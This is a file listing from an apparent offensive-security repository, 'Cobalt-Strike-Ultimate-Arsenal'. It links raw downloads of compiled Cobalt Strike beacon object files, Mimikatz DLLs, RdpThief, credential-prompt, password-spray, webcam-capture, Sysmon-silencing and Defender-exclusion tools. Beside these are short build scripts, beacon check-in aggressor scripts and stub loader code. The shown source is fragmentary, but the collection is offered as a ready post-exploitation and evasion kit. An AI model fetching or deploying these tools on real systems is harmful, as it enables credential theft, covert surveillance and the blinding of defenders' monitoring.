-------------------------------------------------------------------------------- /Cobatl Strike/LoadLib/loadlib.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/LoadLib/loadlib.o -------------------------------------------------------------------------------- /Cobatl Strike/PSremote/psremote.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/PSremote/psremote.o -------------------------------------------------------------------------------- /Loader/COFF Loader/BOF/test64.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/COFF Loader/BOF/test64.out -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/prompt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF CredUI/prompt.png -------------------------------------------------------------------------------- /Cobatl Strike/EnumFiles/enumfiles.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumFiles/enumfiles.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumLib/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumlib.c 4 | move /y enumlib.obj enumlib.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/forcelockscreen.h: -------------------------------------------------------------------------------- 1 | #include 2 | //Main 3 | DECLSPEC_IMPORT BOOL WINAPI USER32$LockWorkStation(void); -------------------------------------------------------------------------------- /Community KIT/css/imgs/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Community KIT/css/imgs/favicon.ico -------------------------------------------------------------------------------- /Loader/BOF Loader/whoami.x64.o.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/BOF Loader/whoami.x64.o.i64 -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/command.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF CredUI/command.png -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/credui.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF CredUI/credui.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/BOF CredUI/credui.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF CredUI/credui.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/inject.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF DLL Inject/inject.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/Shellcode.h: -------------------------------------------------------------------------------- 1 | unsigned char shellcode[] = { 2 | }; 3 | unsigned int len = 798; 4 | -------------------------------------------------------------------------------- /Cobatl Strike/CredPrompt/credprompt.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CredPrompt/credprompt.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumDotnet/enumdotnet.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumDotnet/enumdotnet.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumDrives/enumdrives.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumDrives/enumdrives.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumShares/enumshares.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumShares/enumshares.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumSysmon/enumsysmon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumSysmon/enumsysmon.o -------------------------------------------------------------------------------- /Cobatl Strike/SystemInfo/systeminfo.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/SystemInfo/systeminfo.o -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/entry.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/entry.x64.obj -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/beaconestablishednote.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | bnote($1,"Established: " . formatDate('MM/dd/yyyy HH:mm:ss (z)')); 3 | } -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/dblt/wbe.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Win Exec/doc/dblt/wbe.deb -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/beaconestablishednote.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | bnote($1,"Established: " . formatDate('MM/dd/yyyy HH:mm:ss (z)')); 3 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/say.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | if (-isadmin $1) { 3 | exec("say -v Fiona 'New admin beacon!'"); 4 | } 5 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/beaconestablishednote.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | bnote($1,"Established: " . formatDate('MM/dd/yyyy HH:mm:ss (z)')); 3 | } -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/test32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF DLL Inject/test32.dll -------------------------------------------------------------------------------- /Cobatl Strike/BOF DLL Inject/test64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF DLL Inject/test64.dll -------------------------------------------------------------------------------- /Cobatl Strike/BOF SprayAD/SprayAD.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF SprayAD/SprayAD.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/BOF SprayAD/SprayAD.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BOF SprayAD/SprayAD.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor.exe -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Dec/out.vir: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Dec/out.vir -------------------------------------------------------------------------------- /Cobatl Strike/Elusive Mice/util/hash.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Elusive Mice/util/hash.exe -------------------------------------------------------------------------------- /Cobatl Strike/EnumDotnet/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumdotnet.c 4 | move /y enumdotnet.obj enumdotnet.o 5 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumFiles/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumfiles.c 4 | move /y enumfiles.obj enumfiles.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumHandles/enumhandles.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumHandles/enumhandles.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumWSC/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumwsc.c 4 | move /y enumwsc.obj enumwsc.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/Erebus/post/SharpShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Erebus/post/SharpShell.exe -------------------------------------------------------------------------------- /Cobatl Strike/RDP Thief/RdpThief_x64.tmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/RDP Thief/RdpThief_x64.tmp -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/dblt/wbe.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Win Exec/cmake/dblt/wbe.deb -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/doc/dblt/strike.asm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Win Exec/doc/dblt/strike.asm -------------------------------------------------------------------------------- /Cobatl Strike/Add User BOF/dist/iXY2823.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Add User BOF/dist/iXY2823.PNG -------------------------------------------------------------------------------- /Cobatl Strike/AddExclusion/addexclusion.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddExclusion/addexclusion.o -------------------------------------------------------------------------------- /Cobatl Strike/AddLocalCert/addlocalcert.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddLocalCert/addlocalcert.o -------------------------------------------------------------------------------- /Cobatl Strike/Aggrokatz/bof/fileread_x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Aggrokatz/bof/fileread_x64.o -------------------------------------------------------------------------------- /Cobatl Strike/BlindEventlog/blindeventlog.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/BlindEventlog/blindeventlog.o -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP.cna: -------------------------------------------------------------------------------- 1 | alias dazzleUP { 2 | bdllspawn($1, script_resource("dazzleUP_Reflective_DLL.dll"), $2, "dazzleUP", 5000, false); 3 | } 4 | -------------------------------------------------------------------------------- /Cobatl Strike/DelExclusion/delexclusion.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DelExclusion/delexclusion.o -------------------------------------------------------------------------------- /Cobatl Strike/DelLocalCert/dellocalcert.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DelLocalCert/dellocalcert.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumDrives/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumdrives.c 4 | move /y enumdrives.obj enumdrives.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumHandles/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumhandles.c 4 | move /y enumhandles.obj enumhandles.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumLocalCert/enumlocalcert.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumLocalCert/enumlocalcert.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumSysmon/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumsysmon.c 4 | move /y enumsysmon.obj enumsysmon.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumWebClient/enumwebclient.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumWebClient/enumwebclient.o -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/test/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/test/Resource.rc -------------------------------------------------------------------------------- /Cobatl Strike/IdleTime/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc idletime.c 4 | move /y idletime.obj idletime.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/PSremote/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc psremote.c 4 | move /y psremote.obj psremote.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/PasswordSpray/passwordspray.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/PasswordSpray/passwordspray.o -------------------------------------------------------------------------------- /Cobatl Strike/SilenceSysmon/silencesysmon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/SilenceSysmon/silencesysmon.o -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF.x64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF.x64.obj -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF.x86.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF.x86.obj -------------------------------------------------------------------------------- /Cobatl Strike/WiFiPasswords/wifipasswords.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/WiFiPasswords/wifipasswords.o -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-min.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-min.x64.dll -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-min.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-min.x86.dll -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/cmake/dblt/strike.asm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Win Exec/cmake/dblt/strike.asm -------------------------------------------------------------------------------- /Cobatl Strike/CaptureNetNTLM/capturenetntlm.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CaptureNetNTLM/capturenetntlm.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike MoveKit/Aggressor/payloadGen.cna: -------------------------------------------------------------------------------- 1 | # 2 | # 3 | # MoveKit - Payload Generation 4 | # by: @0xthirteen 5 | # 6 | # 7 | # Not fully moved over yet -------------------------------------------------------------------------------- /Cobatl Strike/DelExclusion/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc delexclusion.c 4 | move /y delexclusion.obj delexclusion.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/DelLocalCert/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dellocalcert.c 4 | move /y dellocalcert.obj dellocalcert.o 5 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumExclusions/enumexclusions.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumExclusions/enumexclusions.o -------------------------------------------------------------------------------- /Cobatl Strike/Spray AD/Spray-AD/Spray-AD.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Spray AD/Spray-AD/Spray-AD.dll -------------------------------------------------------------------------------- /Cobatl Strike/SystemInfo/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc systeminfo.c 4 | move /y systeminfo.obj systeminfo.o 5 | 6 | -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-full.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-full.x64.dll -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-full.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-full.x86.dll -------------------------------------------------------------------------------- /Cobatl Strike/AddExclusion/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addexclusion.c 4 | move /y addexclusion.obj addexclusion.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/AddFirewallRule/addfirewallrule.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddFirewallRule/addfirewallrule.o -------------------------------------------------------------------------------- /Cobatl Strike/CredPrompt/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc credprompt.c 4 | move /y credprompt.obj credprompt.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/DelFirewallRule/delfirewallrule.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DelFirewallRule/delfirewallrule.o -------------------------------------------------------------------------------- /Cobatl Strike/DllComHijacking/dllcomhijacking.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DllComHijacking/dllcomhijacking.o -------------------------------------------------------------------------------- /Cobatl Strike/DllEnvHijacking/dllenvhijacking.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DllEnvHijacking/dllenvhijacking.o -------------------------------------------------------------------------------- /Cobatl Strike/Elusive Mice/bin/elusiveMice.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Elusive Mice/bin/elusiveMice.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Elusive Mice/bin/elusiveMice.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Elusive Mice/bin/elusiveMice.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumSecProducts/enumsecproducts.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/EnumSecProducts/enumsecproducts.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumShares/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumshares.c 4 | move /y enumshares.obj enumshares.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/forcelockscreen.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/ForceLockScreen/forcelockscreen.o -------------------------------------------------------------------------------- /Cobatl Strike/Hell sHall/Hell'sHall/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Hell sHall/Hell'sHall/Resource.rc -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/bfmain.h: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | 3 | SECTION( A ) VOID WINAPI BofMain( _In_ PBAPI_TABLE BeaconApi, _In_ PVOID Argv, _In_ INT Argc ); 4 | -------------------------------------------------------------------------------- /Cobatl Strike/InjectPoolParty/injectpoolparty.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/InjectPoolParty/injectpoolparty.o -------------------------------------------------------------------------------- /Cobatl Strike/PasswordSpray/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc passwordspray.c 4 | move /y passwordspray.obj passwordspray.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/Portscan BOF/bin/pingscanner.bof.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Portscan BOF/bin/pingscanner.bof.o -------------------------------------------------------------------------------- /Cobatl Strike/Portscan BOF/bin/portscanner.bof.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Portscan BOF/bin/portscanner.bof.o -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Webcam BOF/WebcamBOF/WebcamBOF.zip -------------------------------------------------------------------------------- /Cobatl Strike/WiFiPasswords/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc wifipasswords.c 4 | move /y wifipasswords.obj wifipasswords.o 5 | 6 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/hooks/heap.c: -------------------------------------------------------------------------------- 1 | #include "hooks.h" 2 | 3 | SECTION( D ) HANDLE GetProcessHeap_Hook() 4 | { 5 | return ( ( PSTUB )OFFSET( Stub ) )->Heap; 6 | }; 7 | -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/libtcg.x64.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/Cobalt Strike Crystal Kit/libtcg.x64.zip -------------------------------------------------------------------------------- /Loader/Cobalt Strike Crystal Kit/libtp.x64.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Loader/Cobalt Strike Crystal Kit/libtp.x64.zip -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-chrome.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-chrome.x64.dll -------------------------------------------------------------------------------- /Mimikatz Kit/resources/mimikatz-chrome.x86.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Mimikatz Kit/resources/mimikatz-chrome.x86.dll -------------------------------------------------------------------------------- /Cobatl Strike/Add User BOF/dist/AddUser-Bof.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Add User BOF/dist/AddUser-Bof.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Add User BOF/dist/AddUser-Bof.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Add User BOF/dist/AddUser-Bof.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/AddLocalCert/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc addlocalcert.c 4 | move /y addlocalcert.obj addlocalcert.o 5 | 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/AddTaskScheduler/addtaskscheduler.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/AddTaskScheduler/addtaskscheduler.o -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/loader.cna: -------------------------------------------------------------------------------- 1 | # Automatically loads all aggressor scripts. 2 | # Idea taken from Und3rf10w 3 | 4 | include(script_resource("elevate/elevate.cna")); -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/alaris-console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/alaris-console.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/alaris-options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/alaris-options.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/option-staged.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/option-staged.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/pezor-console.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/pezor-console.png -------------------------------------------------------------------------------- /Cobatl Strike/Beaconator/images/pezor-options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Beaconator/images/pezor-options.png -------------------------------------------------------------------------------- /Cobatl Strike/BlindEventlog/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc blindeventlog.c 4 | move /y blindeventlog.obj blindeventlog.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/DelFirewallRule/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc delfirewallrule.c 4 | move /y delfirewallrule.obj delfirewallrule.o 5 | -------------------------------------------------------------------------------- /Cobatl Strike/DelTaskScheduler/deltaskscheduler.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/DelTaskScheduler/deltaskscheduler.o -------------------------------------------------------------------------------- /Cobatl Strike/EnumExclusions/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumexclusions.c 4 | move /y enumexclusions.obj enumexclusions.o 5 | 6 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumWebClient/bofcompile.bat: 